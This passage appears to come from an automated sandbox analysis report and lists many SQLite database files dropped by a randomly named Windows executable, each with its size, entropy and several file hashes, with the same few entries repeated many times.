                                                                                  Entropy (8bit):1.121297215059106
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                                  MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                                  SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                                  SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                                  SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):0.8439810553697228
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO9p7n52GmCWGf+dyMDCFVE1:TeAFawNLopFgU10XJBOB2Gbf+ba+
                                                                                  MD5:9D46F142BBCF25D0D495FF1F3A7609D3
                                                                                  SHA1:629BD8CD800F9D5B078B5779654F7CBFA96D4D4E
                                                                                  SHA-256:C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
                                                                                  SHA-512:AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                  Category:dropped
                                                                                  Size (bytes):40960
                                                                                  Entropy (8bit):0.8553638852307782
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                                  Category:dropped
                                                                                  Size (bytes):196608
                                                                                  Entropy (8bit):1.121297215059106
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                                  MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                                  SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                                  SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                                  SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                                  Category:dropped
                                                                                  Size (bytes):196608
                                                                                  Entropy (8bit):1.121297215059106
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                                  MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                                  SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                                  SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                                  SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                                  Category:dropped
                                                                                  Size (bytes):196608
                                                                                  Entropy (8bit):1.121297215059106
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                                  MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                                  SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                                  SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                                  SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                                  Category:dropped
                                                                                  Size (bytes):196608
                                                                                  Entropy (8bit):1.121297215059106
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                                  MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                                  SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                                  SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                                  SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):0.5712781801655107
                                                                                  Encrypted:false
                                                                                  SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                  MD5:05A60B4620923FD5D53B9204391452AF
                                                                                  SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                  SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                  SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):0.6732424250451717
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                                  MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                                  SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                                  SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                                  SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):0.8439810553697228
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO9p7n52GmCWGf+dyMDCFVE1:TeAFawNLopFgU10XJBOB2Gbf+ba+
                                                                                  MD5:9D46F142BBCF25D0D495FF1F3A7609D3
                                                                                  SHA1:629BD8CD800F9D5B078B5779654F7CBFA96D4D4E
                                                                                  SHA-256:C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
                                                                                  SHA-512:AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):0.6732424250451717
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                                  MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                                  SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                                  SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                                  SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                  Category:dropped
                                                                                  Size (bytes):51200
                                                                                  Entropy (8bit):0.8746135976761988
                                                                                  Encrypted:false
                                                                                  SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                                  MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                                  SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                                  SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                                  SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                                  Category:dropped
                                                                                  Size (bytes):196608
                                                                                  Entropy (8bit):1.121297215059106
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                                  MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                                  SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                                  SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                                  SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                  Category:dropped
                                                                                  Size (bytes):106496
                                                                                  Entropy (8bit):1.136413900497188
                                                                                  Encrypted:false
                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                                  MD5:429F49156428FD53EB06FC82088FD324
                                                                                  SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                                  SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                                  SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                  Category:dropped
                                                                                  Size (bytes):106496
                                                                                  Entropy (8bit):1.136413900497188
                                                                                  Encrypted:false
                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                                  MD5:429F49156428FD53EB06FC82088FD324
                                                                                  SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                                  SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                                  SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                  Category:dropped
                                                                                  Size (bytes):51200
                                                                                  Entropy (8bit):0.8746135976761988
                                                                                  Encrypted:false
                                                                                  SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                                  MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                                  SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                                  SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                                  SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                  Category:dropped
                                                                                  Size (bytes):40960
                                                                                  Entropy (8bit):0.8553638852307782
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):0.8439810553697228
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO9p7n52GmCWGf+dyMDCFVE1:TeAFawNLopFgU10XJBOB2Gbf+ba+
                                                                                  MD5:9D46F142BBCF25D0D495FF1F3A7609D3
                                                                                  SHA1:629BD8CD800F9D5B078B5779654F7CBFA96D4D4E
                                                                                  SHA-256:C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
                                                                                  SHA-512:AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                  Category:dropped
                                                                                  Size (bytes):51200
                                                                                  Entropy (8bit):0.8746135976761988
                                                                                  Encrypted:false
                                                                                  SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                                  MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                                  SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                                  SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                                  SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                  Category:dropped
                                                                                  Size (bytes):40960
                                                                                  Entropy (8bit):0.8553638852307782
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                  Category:dropped
                                                                                  Size (bytes):40960
                                                                                  Entropy (8bit):0.8553638852307782
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                  Category:dropped
                                                                                  Size (bytes):106496
                                                                                  Entropy (8bit):1.136413900497188
                                                                                  Encrypted:false
                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                                  MD5:429F49156428FD53EB06FC82088FD324
                                                                                  SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                                  SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                                  SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):0.5707520969659783
                                                                                  Encrypted:false
                                                                                  SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                  MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                  SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                  SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                  SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                                  Category:dropped
                                                                                  Size (bytes):196608
                                                                                  Entropy (8bit):1.121297215059106
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                                  MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                                  SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                                  SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                                  SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):0.5707520969659783
                                                                                  Encrypted:false
                                                                                  SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                  MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                  SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                  SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                  SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
